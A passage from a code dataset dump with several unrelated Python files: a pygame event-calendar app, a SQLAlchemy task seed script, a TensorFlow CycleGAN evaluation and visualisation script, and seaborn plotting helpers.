textRect1=textSurface.get_rect()\n screen.blit(textSurface,(a,b+5))\n \n def drawThreeIcon(self,screen):\n pygame.draw.circle(screen,self.handCircle[0],(160,679),40)\n screen.blit(self.mannualImg,(160-20,679-20))\n pygame.draw.circle(screen,self.libraryInputCircle[0],(268,639),40)\n 
screen.blit(self.libImg,(268-20,639-20))\n pygame.draw.circle(screen,self.cameraCircle[0],(376,679),40)\n screen.blit(self.camImg,(376-20,679-20))\n\n def drawOrangeBtn(self,screen,loc):\n screen.blit(self.oImg,loc)\n \n def drawInterestBar(self,screen):\n if len(self.interestList)==0:\n pass\n else:\n for i in range(0,len(self.interestList)):\n box=(43,250+20*i+35*i,len(self.interestList[i])*20,35)\n pygame.draw.rect(screen,self.orange,box)\n self.displayText(screen,self.interestList[i],43,250+20*i+35*i,len(self.interestList[i])*20,35,self.black,self.regularFont)\n \n \n######### get event #####\n def extractInfo(self):\n if self.mode == 'working':\n if self.numlist[0] == 1:\n self.info.append(getTextOne(self.path))\n elif self.numlist[0] == 2:\n infoDic = interestFilterTwo(self.path)\n if isinstance(infoDic,list):\n self.info += infoDic\n elif isinstance(infoDic,dict):\n self.info += [infoDic]\n elif self.numlist[0] == 3:\n infoDic = interestFilterThree(self.path)\n if isinstance(infoDic,list):\n self.info += infoDic\n elif isinstance(infoDic,dict):\n self.info += [infoDic]\n elif self.numlist[0] == 4:\n infoDic = interestFilterFour(self.path)\n if isinstance(infoDic,list):\n self.info += infoDic\n elif isinstance(infoDic,dict):\n self.info += [infoDic]\n elif self.numlist[0] == 5:\n infoDic = interestFilterFive(self.path)\n if isinstance(infoDic,list):\n self.info += infoDic\n elif isinstance(infoDic,dict):\n self.info += [infoDic]\n return self.info\n \n def getDate(self):\n if len(self.info) == 1:\n item = self.info[0]\n for key in item:\n if key == 'date':\n for numlike in item[key][0].split(' '):\n date=''\n if (len(numlike) == 2 and numlike.isdigit()):date=numlike\n elif (len(numlike) == 3 and (numlike[:-1].isdigit() and numlike[-1].isdigit()==False)):\n date=numlike[:-1]\n elif (len(numlike)==3 and numlike[1:].isdigit() and numlike[0].isdigit()==False):\n date=numlike[1:]\n elif (len(numlike) == 1 and numlike.isdigit()):date = numlike\n return [item['event'],date,item['location'],item['time']]\n elif len(self.info) == 2:\n item1 = self.info[0]\n for key in item1:\n if key == 'date':\n for numlike in item1[key][0].split(' '):\n date1=''\n if (len(numlike) == 2 and numlike.isdigit()):date1=numlike\n elif (len(numlike) == 3 and (numlike[:-1].isdigit() and numlike[-1].isdigit()==False)):\n date1=numlike[:-1]\n elif (len(numlike)==3 and numlike[1:].isdigit() and numlike[0].isdigit()==False):\n date1=numlike[1:]\n elif (len(numlike) == 1 and numlike.isdigit()):date1 = numlike\n item2 = self.info[1]\n for key in item2:\n if key == 'date':\n for numlike in item2[key][0].split(' '):\n date2=''\n if (len(numlike) == 2 and numlike.isdigit()):date2=numlike\n elif (len(numlike) == 3 and (numlike[:-1].isdigit() and numlike[-1].isdigit()==False)):\n date2=numlike[:-1]\n elif (len(numlike)==3 and numlike[1:].isdigit() and numlike[0].isdigit()==False):\n date2=numlike[1:]\n elif (len(numlike) == 1 and numlike.isdigit()):date2 = numlike\n return [[item1['event'],date1,item1['location'],item1['time']],\n [item2['event'],date2,item2['location'],item2['time']]] \n \n def time(self):\n if len(self.getDate()) >= 2:\n date = int(self.getDate()[1])\n i = date//7+1\n j = date-i*7\n self.day[i][j] += 1\n elif len(self.gateDate()) == 2:\n for c in self.gateDate():\n date = c[1]\n i = date//7+1\n j = date-i*7\n self.day[i][j] += 1\n \n \n \n\n############### redraw ####\n def redrawSign(self, screen):\n if self.mode == \"sign\":\n self.drawSign(screen)\n self.drawSignButtons(screen)\n \n def 
redrawInterest(self, screen):\n if self.mode == \"interest\":\n self.drawSubpage(screen)\n self.drawInterestInput(screen)\n self.drawInterestBar(screen)\n screen.blit(self.doneImg,(518-50,0))\n \n def redrawMain(self, screen):\n if self.mode == \"main\":\n screen.fill(self.grey)\n self.displayText(screen,\"New Events\", 200,80,0,0,self.white,self.topicFont)\n self.drawMainBtn(screen)\n self.drawEventBtn(screen,self.mainEvent1[4],self.mainEvent1[:4])\n self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent1[0],self.mainEvent1[1],100,70)\n self.drawEventBtn(screen,self.mainEvent2[4],self.mainEvent2[:4])\n self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent2[0],self.mainEvent2[1],100,70)\n self.drawEventBtn(screen,self.mainEvent3[4],self.mainEvent3[:4])\n self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent3[0],self.mainEvent3[1],100,70)\n\n self.drawComBtn(screen)\n self.drawCalBtn(screen)\n screen.blit(self.oImg,(235,715))\n self.drawSettingBtn(screen)\n \n def redrawThreeIcon(self,screen):\n if self.mode == \"threeIcon\":\n screen.fill(self.grey)\n self.displayText(screen,\"New Events\", 200,80,0,0,self.white,self.topicFont)\n self.drawMainBtn(screen)\n self.drawEventBtn(screen,self.mainEvent1[4],self.mainEvent1[:4])\n self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent1[0],self.mainEvent1[1],100,70)\n self.drawEventBtn(screen,self.mainEvent2[4],self.mainEvent2[:4])\n self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent2[0],self.mainEvent2[1],100,70)\n self.drawEventBtn(screen,self.mainEvent3[4],self.mainEvent3[:4])\n self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent3[0],self.mainEvent3[1],100,70)\n\n self.drawComBtn(screen)\n self.drawCalBtn(screen)\n screen.blit(self.oImg,(235,715))\n self.drawThreeIcon(screen)\n\n def redrawHand(self,screen):\n if self.mode==\"hand\":\n self.drawSubpage(screen)\n self.drawInputBox(screen)\n self.drawInputBoxText(screen)\n screen.blit(self.doneImg,(518-50,0))\n \n \n def redrawLibraryInput(self,screen):\n if self.mode == \"libraryInput\":\n self.drawSubpage(screen)\n pygame.draw.circle(screen,self.importButtons[0],(268,500),200)\n self.displayText(screen,\"Input\",68,300,400,400,self.white,self.topicFont)\n \n\n \n def redrawCalendar(self,screen):\n if self.mode == \"calendar\":\n self.calendarApril(screen)\n for i in range(5):\n for j in range(7):\n if self.day[i][j] >= 1:\n pygame.draw.circle(screen,self.black,(250 + j *70-223+30, 130 + i * 70+100+60),10)\n \n def redrawCalendarMarch(self,screen):\n if self.mode == \"calendarMarch\":\n self.calendarMarch(screen)\n \n def redrawCalendarMay(self,screen):\n if self.mode == \"calendarMay\":\n self.calendarMay(screen)\n \n def redrawWorking(self,screen):\n if self.mode == \"working\":\n self.displayText(screen,\"Working...\",100,300,100,-70,self.black,self.cuteFont)\n pygame.draw.rect(screen,self.white,(100,300,350,50))\n pygame.draw.rect(screen,self.black,(100,300,self.w,50))\n if self.num == 0:\n self.drawOrangeBtn(screen,(30,600))\n self.drawOrangeBtn(screen,(130,600))\n self.drawOrangeBtn(screen,(230,600))\n self.drawOrangeBtn(screen,(330,600))\n self.drawOrangeBtn(screen,(430,600))\n if self.num == 1:\n self.drawOrangeBtn(screen,(30,600+self.h1))\n self.drawOrangeBtn(screen,(130,600))\n self.drawOrangeBtn(screen,(230,600))\n self.drawOrangeBtn(screen,(330,600))\n self.drawOrangeBtn(screen,(430,600))\n elif self.num == 2:\n self.drawOrangeBtn(screen,(30,600))\n self.drawOrangeBtn(screen,(130,600+self.h2))\n self.drawOrangeBtn(screen,(230,600))\n 
self.drawOrangeBtn(screen,(330,600))\n self.drawOrangeBtn(screen,(430,600))\n elif self.num == 3:\n self.drawOrangeBtn(screen,(30,600))\n self.drawOrangeBtn(screen,(130,600))\n self.drawOrangeBtn(screen,(230,600+self.h3))\n self.drawOrangeBtn(screen,(330,600))\n self.drawOrangeBtn(screen,(430,600))\n elif self.num == 4:\n self.drawOrangeBtn(screen,(30,600))\n self.drawOrangeBtn(screen,(130,600))\n self.drawOrangeBtn(screen,(230,600))\n self.drawOrangeBtn(screen,(330,600+self.h4))\n self.drawOrangeBtn(screen,(430,600))\n elif self.num == 5:\n self.drawOrangeBtn(screen,(30,600))\n self.drawOrangeBtn(screen,(130,600))\n self.drawOrangeBtn(screen,(230,600))\n self.drawOrangeBtn(screen,(330,600))\n self.drawOrangeBtn(screen,(430,600+self.h5))\n \n \n def redrawFinish(self,screen):\n if self.mode == \"finish\":\n self.numList = []\n self.drawSubpage(screen)\n self.displayText(screen,\"Done!\",50,200,430,300,self.orange,self.cuteFont)\n screen.blit(self.oImg,(180,400))\n \n def redrawCalendarYes(self,screen):\n \n if self.mode == \"calendarYes\":\n self.calendarYes(screen)\n drawText(self,[\"THE REVOLUTION\",\"APRIL 27\",\"\",\"FT.LAUDERDALE,FLORIDA\"],screen,self.mainEvent1[0],self.mainEvent1[1])\n getDateList=self.getDate()\n print(getDateList)\n if len(getDateList) > 2:\n self.drawEventBtn(screen,self.mainEven2[4],self.mainEvent2[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent2[0],self.mainEvent2[1])\n else:\n self.drawEventBtn(screen,self.mainEven2[4],self.mainEvent2[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent2[0],self.mainEvent2[1])\n self.drawEventBtn(screen,self.mainEven3[4],self.mainEvent3[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent3[0],self.mainEvent3[1])\n \n \n def redrawCalendarNo(self,screen):\n if self.mode == \"calendarNo\":\n self.calendarNo(screen)\n \n def redrawCommunity(self,screen):\n if self.mode == \"community\":\n self.drawSubpage(screen)\n pygame.draw.rect(screen,self.friendEventBtn[4],self.friendEventBtn[:4])\n self.displayText(screen,\"Friends' Event\",self.friendEventBtn[0],\n self.friendEventBtn[1],300,200,self.black,self.cuteFont)\n pygame.draw.rect(screen,self.localEventBtn[4],self.localEventBtn[:4])\n self.displayText(screen,\"Local Event\",self.localEventBtn[0],\n self.localEventBtn[1],300,200,self.black,self.cuteFont)\n self.displayText(screen,\"OR\",100,550,200,100,self.black,self.cuteFont)\n self.drawSearchBtn(screen,(400,700))\n \n def redrawCommunityFriends(self,screen):\n if self.mode == \"communityFriends\":\n self.drawCommunityFriends(screen)\n \n\n \n def redrawAll(self, screen):\n self.redrawSign(screen)\n self.redrawInterest(screen)\n self.redrawMain(screen)\n self.redrawLibraryInput(screen)\n self.redrawCalendar(screen)\n self.redrawWorking(screen)\n self.redrawFinish(screen)\n self.redrawCalendarYes(screen)\n self.redrawCalendarNo(screen)\n self.redrawCalendarMarch(screen)\n self.redrawCalendarMay(screen)\n self.redrawCommunity(screen)\n self.redrawCommunityFriends(screen)\n self.redrawThreeIcon(screen)\n self.redrawHand(screen)\n \n\n def isKeyPressed(self, key):\n ''' return whether a specific key is being held '''\n return self._keys.get(key, False)\n\n def __init__(self, width=536, height=819, fps=50, title=\"BlackOrange\"):\n self.width = width\n self.height = height\n self.fps = fps\n self.title = title\n self.bgColor = 
(99,99,112)\n\n pygame.init()\n \n\n def run(self):\n clock = pygame.time.Clock()\n screen = pygame.display.set_mode((self.width, self.height))\n # set the title of the window\n pygame.display.set_caption(self.title)\n\n # stores all the keys currently being held down\n self._keys = dict()\n\n # call game-specific initialization\n self.init()\n\n playing = True\n while playing:\n time = clock.tick(self.fps)\n self.timerFired(time)\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n self.mousePressed(*(event.pos))\n print(event.pos)\n self.currentPos=event.pos\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n self.mouseReleased(*(event.pos))\n elif (event.type == pygame.MOUSEMOTION and\n event.buttons == (0, 0, 0)):\n self.mouseMotion(*(event.pos))\n # elif (event.type == pygame.MOUSEMOTION and\n # event.buttons[0] == 1):\n # self.mouseDrag(*(event.pos))\n elif event.type == pygame.KEYDOWN:\n self._keys[event.key] = True\n self.keyPressed(event.key, event.mod,self.currentPos)\n elif event.type == pygame.KEYUP:\n self._keys[event.key] = False\n self.keyReleased(event.key, event.mod)\n elif event.type == pygame.QUIT:\n playing = False\n screen.fill(self.bgColor)\n self.redrawAll(screen)\n pygame.display.flip()\n\n pygame.quit()\n\ndef main():\n game = PygameGame(536,819)\n game.run()\n\nif __name__ == '__main__':\n main()","sub_path":"Hack112.py","file_name":"Hack112.py","file_ext":"py","file_size_in_byte":51779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"612916715","text":"from app.models import db, Task\n\n\n# Adds a demo user, you can add other users here if you want\ndef seed_tasks():\n\n data = [\n Task(taskName = \"Clean the shower\", taskBody = \"Use scrubbing bubbles to remove soap scum.\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 1, projectId = 1),\n Task(taskName = \"Clean the toilet\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 2, projectId = 1),\n Task(taskName = \"Clean Sink\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 3, projectId = 1),\n Task(taskName = \"Wipe counters down\", taskBody = \"Clean counters using disinfectant\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 3, projectId = 2),\n Task(taskName = \"Clean the oven\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 2, projectId = 2),\n Task(taskName = \"Wash the dishes\", taskBody = \"Load dishes into the dish washer.\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 1, projectId = 2),\n Task(taskName = \"Sort and Wash clothes\", taskBody = \"Seperate darks and lights\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 4, projectId = 3),\n Task(taskName = \"Dry the clothes\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 5, projectId = 3),\n Task(taskName = \"Fold the clothes\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 6, projectId = 3),\n Task(taskName = \"Cut the grass\", taskBody = \"Use scissors to cut grass for precision cut.\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 5, projectId = 4),\n Task(taskName = \"Rake up the leaves\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 5, projectId = 4),\n Task(taskName = \"Pick up crabapples\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, 
assignedUserId = 4, projectId = 4),\n\n ]\n for task in data:\n db.session.add(task)\n db.session.commit()\n\n\n# Uses a raw SQL query to TRUNCATE the users table.\n# SQLAlchemy doesn't have a built in function to do this\n# TRUNCATE Removes all the data from the table, and resets\n# the auto incrementing primary key\ndef undo_tasks():\n db.session.execute('TRUNCATE tasks RESTART IDENTITY CASCADE;')\n db.session.commit()\n","sub_path":"app/seeds/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"450863385","text":"import tensorflow as tf\nfrom model import CycleGAN\nfrom data_reader import get_source_batch, get_target_batch,get_single_img\nfrom datetime import datetime\nimport os\nimport logging\nimport cv2\nfrom utils import ImagePool\nimport fuzzy\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve,auc\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA\nfrom compute_accuracy import computeAccuracy\nfrom plot_til.plot_func import plot_fake_xy,plot_conv_output,generate_occluded_imageset,draw_heatmap\nfrom plot_til import utils\nfrom fuzzy import cal_U\nimport matplotlib.cm as cm\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '1'\n\nFLAGS = tf.flags.FLAGS\n\ntf.flags.DEFINE_integer('batch_size', 1, 'batch size, default: 1')\ntf.flags.DEFINE_integer('image_size', 256, 'image size, default: 256')\ntf.flags.DEFINE_bool('use_lsgan', True,\n 'use lsgan (mean squared error) or cross entropy loss, default: True')\ntf.flags.DEFINE_string('norm', 'instance',\n '[instance, batch] use instance norm or batch norm, default: instance')\ntf.flags.DEFINE_integer('lambda1', 10,\n 'weight for forward cycle loss (X->Y->X), default: 10')\ntf.flags.DEFINE_integer('lambda2', 10,\n 'weight for backward cycle loss (Y->X->Y), default: 10')\ntf.flags.DEFINE_float('learning_rate', 2e-4, # 2e-4\n 'initial learning rate for Adam, default: 0.0002')\ntf.flags.DEFINE_float('learning_rate2', 2e-6, # 2e-6\n 'initial learning rate for Adam, default: 0.000002')\ntf.flags.DEFINE_float('beta1', 0.5,\n 'momentum term of Adam, default: 0.5')\ntf.flags.DEFINE_float('pool_size', 50,\n 'size of image buffer that stores previously generated images, default: 50')\ntf.flags.DEFINE_integer('ngf', 64,\n 'number of gen filters in first conv layer, default: 64')\ntf.flags.DEFINE_string('X', '/home/root123/data/datasets/source/',\n 'X tfrecords file for training, default: data/tfrecords/apple.tfrecords')\ntf.flags.DEFINE_string('Y', '/home/root123/data/datasets/target/toxo40/',\n 'Y tfrecords file for training, default: data/tfrecords/orange.tfrecords')\ntf.flags.DEFINE_string('load_model', '20190508-2326/max',\n 'folder of saved model that you wish to continue training (e.g. 
20170602-1936), default: None')\ntf.flags.DEFINE_string('UC_name', \"crescent\",\n 'name of the source data, default: None')\n\nUx = Uy = Cx = Cy = None\n\nx_img_path='/home/root123/data/datasets/source/banana/train/0_000004.jpg'\nx_name=x_img_path.split('/')[-1].split('.')[0]\ny_img_path='/home/root123/data/FCGAN/data/'\ny_name=y_img_path.split('/')[-1].split('.')[0]\n\ndef train():\n if FLAGS.load_model is not None:\n checkpoints_dir = \"checkpoints/\" + FLAGS.load_model.lstrip(\"checkpoints/\")\n print(checkpoints_dir)\n else:\n logging.info('No model to test, stopped!')\n return\n\n graph = tf.Graph()\n with graph.as_default():\n cycle_gan = CycleGAN(\n batch_size=FLAGS.batch_size,\n image_size=FLAGS.image_size,\n use_lsgan=FLAGS.use_lsgan,\n norm=FLAGS.norm,\n lambda1=FLAGS.lambda1,\n lambda2=FLAGS.lambda2,\n learning_rate=FLAGS.learning_rate,\n learning_rate2=FLAGS.learning_rate2,\n beta1=FLAGS.beta1,\n ngf=FLAGS.ngf\n )\n G_loss, D_Y_loss, F_loss, D_X_loss, fake_y, fake_x, Disperse_loss, Fuzzy_loss, feature_x, feature_y = cycle_gan.model()\n\n summary_op = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(checkpoints_dir, graph)\n saver = tf.train.Saver()\n logging.info('Network Built!')\n\n with tf.Session(graph=graph) as sess:\n checkpoint = tf.train.get_checkpoint_state(checkpoints_dir)\n meta_graph_path = checkpoint.model_checkpoint_path + \".meta\"\n restore = tf.train.import_meta_graph(meta_graph_path)\n restore.restore(sess, tf.train.latest_checkpoint(checkpoints_dir))\n step = int(meta_graph_path.split(\"-\")[2].split(\".\")[0])\n Ux = np.loadtxt(checkpoints_dir + \"/Ux\" + FLAGS.UC_name + '.txt', delimiter=\",\")\n Ux = [[x] for x in Ux]\n Uy = np.loadtxt(checkpoints_dir + \"/Uy\" + FLAGS.UC_name + '.txt', delimiter=\",\")\n Cx = np.loadtxt(checkpoints_dir + \"/Cx\" + FLAGS.UC_name + '.txt', delimiter=\",\")\n Cx = [Cx]\n Cy = np.loadtxt(checkpoints_dir + \"/Cy\" + FLAGS.UC_name + '.txt', delimiter=\",\")\n logging.info('Parameter Initialized!')\n\n #print('Ux',Ux)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n try:\n plots_count=10\n tsne_plot_count=1000\n result_dir='./result'\n fake_dir=os.path.join(result_dir,'fake_xy')\n roc_dir=os.path.join(result_dir,'roc_curves')\n plot_dir=os.path.join(result_dir,'tsne_pca')\n conv_dir=os.path.join(result_dir,'convs')\n #occ_dir=os.path.join(result_dir,'occ_test')\n #utils.prepare_dir(occ_dir)\n\n x_path = FLAGS.X + FLAGS.UC_name\n x_images, x_id_list, x_len, x_labels, oimg_xs, x_files = get_source_batch(0, 256, 256,\n source_dir=x_path)\n y_images, y_id_list, y_len, y_labels, oimg_ys, y_files = get_target_batch(0, 256, 256,\n target_dir=FLAGS.Y)\n #Compute Accuracy, tp, tn, fp, fn, f1_score, recall, precision, specificity#\n accuracy, tp, tn, fp, fn, f1_score, recall, precision, specificity=computeAccuracy(Uy,y_labels)\n print(\"accuracy:%.4f\\ttp:%d\\ttn:%d\\tfp %d\\tfn:%d\\tf1_score:%.3f\\trecall:%.3f\\tprecision:%.3f\\tspecicity:%.3f\\t\" %\n (accuracy, tp, tn, fp, fn,f1_score, recall, precision, specificity))\n #cv2.imshow('201',oimg_ys[201])\n #cv 2.waitKey()\n #draw ROC curves\n '''\n print('y_labels:',np.shape(y_labels))\n print('y_scores:',np.shape(Uy[:,0]))\n fpr,tpr,thresholds=roc_curve(y_labels,Uy[:,1])\n roc_auc=auc(fpr,tpr)\n plt.plot(fpr, tpr)\n plt.xticks(np.arange(0, 1, 0.1))\n plt.yticks(np.arange(0, 1, 0.1))\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n # plt.title(\"A simple plot\")\n plt.show()\n 
print('fpr:',np.shape(fpr))\n    print('tpr:', np.shape(tpr))\n    print('thresholds:', np.shape(thresholds))\n    '''\n            # t-SNE and PCA plots#\n            for j in range(plots_count):\n                feature_path=os.path.join(checkpoints_dir,'feature_fcgan.npy')\n                feature=np.load(feature_path)\n                print('feature:',len(feature))\n                randIdx = random.sample(range(0, len(y_labels)), tsne_plot_count)\n                t_features = []\n                t_labels = []\n                for i in range(len(randIdx)):\n                    t_features.append(feature[randIdx[i]])\n                    t_labels.append(y_labels[randIdx[i]])\n                # Use t-SNE for dimensionality reduction, from 100 dimensions down to 2.\n                tsne = TSNE(n_components=2, learning_rate=100).fit_transform(t_features)\n                #pca = PCA().fit_transform(t_features)\n                # Set the figure size\n                plt.figure(figsize=(6, 6))\n                #plt.subplot(121)\n                plt.scatter(tsne[:, 0], tsne[:, 1], c=t_labels)\n                #plt.subplot(122)\n                #plt.scatter(pca[:, 0], pca[:, 1], c=t_labels)\n                plt.colorbar() # With this single line you can tell which class each color corresponds to. Amazing!\n                utils.prepare_dir(plot_dir)\n                plt.savefig(os.path.join(plot_dir,'plot{}.pdf'.format(j)))\n\n\n            for i in range(10):\n            #if True:\n                #Cross Domain Image Generation#\n\n                x_img,_,x_oimg = get_single_img(x_img_path)\n                y_path=os.path.join(y_img_path,str(i+1)+'.jpg')\n                y_img,_,y_oimg=get_single_img(y_path)\n                fake_y_eval,fake_x_eval, conv_y_eval = sess.run(\n                    [fake_y, fake_x, tf.get_collection('conv_output')],\n                    feed_dict={cycle_gan.x: x_img, cycle_gan.y: y_img})\n                #print(np.shape(fake_y_eval))\n                #print(np.shape(fake_x_eval))\n                #print(np.shape(conv_y_eval))\n                plot_fake_xy(fake_y_eval[0], fake_x_eval[0], x_name, str(i+1), x_oimg,y_oimg,fake_dir)\n                print('processing:',i)\n\n            #Feature Map Visualization#\n\n            print('conv_len:', len(conv_y_eval))\n            print('conv_shape:',np.shape(conv_y_eval[0]))\n            id_y_dir=os.path.join(conv_dir, str(y_name))\n            #utils.prepare_dir()\n            for i, c in enumerate(conv_y_eval):\n                #conv_i_dir=os.path.join(id_y_dir,'_layer_'+str(i))\n                plot_conv_output(c,i,id_y_dir)\n            #print(os.path.join(id_y_dir, 'y.png'))\n            cv2.imwrite(os.path.join(id_y_dir, 'y.png'), y_oimg)\n\n            #Occlusion Test#\n            '''\n            if True:\n                t_imgs, t_lbs, t_img = get_single_img(t_img_path)\n                #s_imgs, s_lbs, t_img = get_single_img(s_img_path)\n                width=np.shape(t_imgs[0])[0]\n                height=np.shape(t_imgs[0])[1]\n                #print('width:',width)\n                #print('height:', height)\n                data=generate_occluded_imageset(t_imgs[0],width=width,height=height,occluded_size=16)\n                #print(data.shape[0])\n                #print('Cy:',Cy)\n                u_ys=np.empty([data.shape[0]],dtype='float64')\n                occ_map=np.empty((width,height),dtype='float64')\n                print(occ_map.shape)\n                cnt=0\n                feature_y_eval = sess.run(\n                    feature_y,\n                    feed_dict={cycle_gan.y: [data[0]]})\n                # print(feature_y_eval)\n                idx_u = 0\n                u_y0 = cal_U(feature_y_eval[0], Cy, 2, 2)[idx_u]\n                occ_value=0\n                print('u_y0:',u_y0)\n                for i in range(width):\n                    print('column idx:',i)\n                    print(str(cnt) + ':' + str(occ_value))\n                    for j in range(height):\n                        feature_y_eval = sess.run(\n                            feature_y,\n                            feed_dict={cycle_gan.y: [data[cnt+1]]})\n                        # print(feature_y_eval)\n                        u_y = cal_U(feature_y_eval[0], Cy, 2, 2)[idx_u]\n                        #print('u_y0:', u_y0)\n                        #print('u_y:',u_y)\n                        occ_value=u_y0-u_y\n                        occ_map[i,j]=occ_value\n                        #print(str(cnt)+':'+str(occ_value))\n                        cnt+=1\n\n                occ_map_path=os.path.join(occ_dir,'occlusion_map.txt')\n                np.savetxt(occ_map_path, occ_map, fmt='%0.20f')\n                cv2.imwrite(os.path.join(occ_dir, 'occ_test.png'), oimg_ys[id_y])\n                draw_heatmap(occ_map_path=occ_map_path,ori_img=t_img,save_dir=os.path.join(occ_dir,'heatmap.png'))\n            '''\n\n\n        except KeyboardInterrupt:\n            logging.info('Interrupted')\n            coord.request_stop()\n        except Exception as e:\n            coord.request_stop(e)\n        finally:\n            #save_path = 
saver.save(sess, checkpoints_dir + \"/model.ckpt\", global_step=step)\n            #np.savetxt(checkpoints_dir + \"/Uy\" + FLAGS.UC_name + '.txt', Uy, fmt=\"%.20f\", delimiter=\",\")\n            #np.savetxt(checkpoints_dir + \"/Cy\" + FLAGS.UC_name + '.txt', Cy, fmt=\"%.20f\", delimiter=\",\")\n            #np.savetxt(checkpoints_dir + \"/Ux\" + FLAGS.UC_name + '.txt', Ux, fmt=\"%.20f\", delimiter=\",\")\n            #np.savetxt(checkpoints_dir + \"/Cx\" + FLAGS.UC_name + '.txt', Cx, fmt=\"%.20f\", delimiter=\",\")\n            logging.info(\"stopped\")\n            # When done, ask the threads to stop.\n            coord.request_stop()\n        coord.join(threads)\n\n\ndef main(unused_argv):\n    train()\n\n\nif __name__ == '__main__':\n    logging.basicConfig(level=logging.INFO)\n    tf.app.run()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":12547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"582638488","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nfrom matplotlib.gridspec import GridSpec, GridSpecFromSubplotSpec\nfrom scipy.stats import norm\nfrom sklearn.decomposition import PCA\nimport plotly.express as px\n\ncust_palt = ['#111d5e','#c70039','#37b448','#B43757', '#ffbd69', '#ffc93c','#FFFF33','#FFFACD',]\n\n# Plot histograms of the categorical feature in the given column, train first, then test.\n#in :train data, test data, visualizing column name\n#out :-\ndef histCategory(dfTrain, clmnNm, dfTest=None):\n    figure = plt.figure(figsize=(12, 4))\n    gs_master = GridSpec(nrows=1, ncols=2, figure=figure)\n    \n    ax1 = figure.add_subplot(gs_master[0, 0])\n    ax1.set_title(\"Train \" + clmnNm,weight='bold')\n    sns.countplot(x=clmnNm,\n                  data=dfTrain,\n                  ax=ax1,\n                  order=dfTrain[clmnNm].value_counts().index)\n    total = float(len(dfTrain[clmnNm]))\n    for p in ax1.patches:\n        ax1.text(p.get_x() + p.get_width() / 2., #width(x) :get_x is the position of the left edge of the bar\n                p.get_height() + 2, #height(y)\n                '{:1.2f}%'.format((p.get_height() / total) * 100),\n                ha='center')\n    \n    \n    if dfTest is not None:\n        ax2 = figure.add_subplot(gs_master[0, 1])\n        ax2.set_title(\"Test \" + clmnNm,weight='bold')\n        sns.countplot(x=clmnNm,\n                      data=dfTest,\n                      ax=ax2,\n                      order=dfTest[clmnNm].value_counts().index)\n        total = float(len(dfTest[clmnNm]))\n        for p in ax2.patches:\n            ax2.text(p.get_x() + p.get_width() / 2., #width(x) :get_x is the position of the left edge of the bar\n                    p.get_height() + 2, #height(y)\n                    '{:1.2f}%'.format((p.get_height() / total) * 100),\n                    ha='center')\n    \n    return\n\n\n\n# Histogram of an indexed 1-D data frame (horizontal)\ndef histCntHorizontal(cntWithIdx):\n    fig = plt.figure(figsize=(20,15))\n    sns.barplot(y = cntWithIdx.reset_index()[\"index\"].astype(str), x = cntWithIdx.values)\n    plt.show()\n    return\n\n\n\n# Histogram of an indexed 1-D data frame (vertical)\ndef histCntVertical(cntWithIdx):\n    fig = plt.figure(figsize=(20,10))\n    sns.barplot(x = cntWithIdx.reset_index()[\"index\"].astype(str), y = cntWithIdx.values)\n    plt.show()\n    return\n\n\n\n# Distribution of a 1-D data frame via kernel density estimation (KDE)\ndef distKde(distDf):\n    fig = plt.figure(figsize=(20,10))\n    sns.kdeplot(distDf.values.reshape(1, len(distDf))[0], shade=True)\n    plt.show()\n    return\n\n\n\n# Distributions of the meta statistics (mean, median, min, max, std, variance, skew, kurtosis)\n# Inspect how the meta statistics differ between train and test\ndef metaDist(dfTrain, dfTest):\n    fig = plt.figure(constrained_layout=True, figsize=(20, 16))\n    grid = GridSpec(ncols=4, nrows=4, figure=fig)\n    \n    ax1 = fig.add_subplot(grid[0, :2])\n    ax1.set_title('Distribution of Mean Values per Column', weight='bold')\n    sns.kdeplot(dfTrain.mean(axis=0),color=cust_palt[0], shade=True, label='Train')\n    sns.kdeplot(dfTest.mean(axis=0),color=cust_palt[1], 
